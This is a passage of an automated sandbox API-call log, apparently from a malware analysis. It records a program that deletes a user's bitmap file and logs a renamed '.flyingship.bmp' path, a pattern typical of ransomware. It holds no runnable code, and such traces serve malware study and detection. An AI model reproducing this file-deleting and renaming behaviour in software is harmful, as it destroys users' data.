| out: hHeap=0x8a0000) returned 1 [0190.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0190.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0190.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0190.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0190.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0190.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0190.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0190.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0190.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0190.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0190.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0190.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0190.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0190.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0190.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0190.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0190.047] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.047] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.047] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.047] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0190.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0190.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0190.047] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.047] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.047] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.048] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0190.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0190.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0190.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0190.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0190.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0190.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0190.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0190.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0190.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0190.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0190.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0190.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0190.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0190.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0190.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0190.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0190.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0190.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0190.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0190.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0190.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0190.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0190.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0190.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0190.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0190.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0190.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0190.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0190.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.049] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.049] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.049] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.049] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.049] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0190.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0190.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0190.049] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.049] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.049] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.050] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0190.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0190.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0190.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0190.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0190.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0190.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0190.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0190.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0190.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0190.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0190.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0190.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0190.050] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.050] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.050] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.050] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp", lpFilePart=0x0) returned 0x53 [0190.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0190.050] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x525098e0, ftCreationTime.dwHighDateTime=0x1d5dd7a, ftLastAccessTime.dwLowDateTime=0xf1e50b30, ftLastAccessTime.dwHighDateTime=0x1d5df13, ftLastWriteTime.dwLowDateTime=0x1681e3a0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x176ff, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="QS5wBgJkU5.bmp", cAlternateFileName="QS5WBG~1.BMP")) returned 0x90ae18 [0190.051] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\qs5wbgjku5.bmp")) returned 1 [0190.053] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x525098e0, ftCreationTime.dwHighDateTime=0x1d5dd7a, ftLastAccessTime.dwLowDateTime=0xf1e50b30, ftLastAccessTime.dwHighDateTime=0x1d5df13, ftLastWriteTime.dwLowDateTime=0x1681e3a0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x176ff, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="QS5wBgJkU5.bmp", cAlternateFileName="QS5WBG~1.BMP")) returned 0 [0190.053] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0190.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0190.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0190.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0190.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6f00 | out: hHeap=0x8a0000) returned 1 [0190.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0190.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0190.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0190.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0190.056] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0190.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0190.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0190.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0190.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0190.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0190.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0190.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0190.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0190.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0190.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0190.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0190.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0190.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0190.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0190.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0190.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0190.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0190.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0190.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0190.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0190.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0190.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0190.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0190.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0190.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0190.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0190.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0190.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0190.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0190.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0190.058] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.058] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0190.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0190.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.059] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0190.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0190.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0190.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0190.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0190.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0190.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0190.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0190.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0190.059] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.059] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.059] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.059] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.059] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0190.059] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.060] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0190.060] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.060] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0190.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0190.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0190.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0190.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.060] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0190.060] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x2e43, lpOverlapped=0x0) returned 1 [0190.060] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0190.060] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x2e43, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.060] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0190.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0190.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0190.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0190.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0190.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.flyingship.bmp\r\n", cchWideChar=97, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 97 [0190.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x61) returned 0x8e8320 [0190.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.flyingship.bmp\r\n", cchWideChar=97, lpMultiByteStr=0x8e8320, cbMultiByte=97, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.flyingship.bmp\r\n", lpUsedDefaultChar=0x0) returned 97 [0190.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0190.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0190.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8320 | out: hHeap=0x8a0000) returned 1 [0190.061] WriteFile (in: hFile=0x160, lpBuffer=0x906f38*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x906f38*, lpNumberOfBytesWritten=0x87f43c*=0x60, lpOverlapped=0x0) returned 1 [0190.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0190.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0190.061] CloseHandle (hObject=0x160) returned 1 [0190.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0190.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: 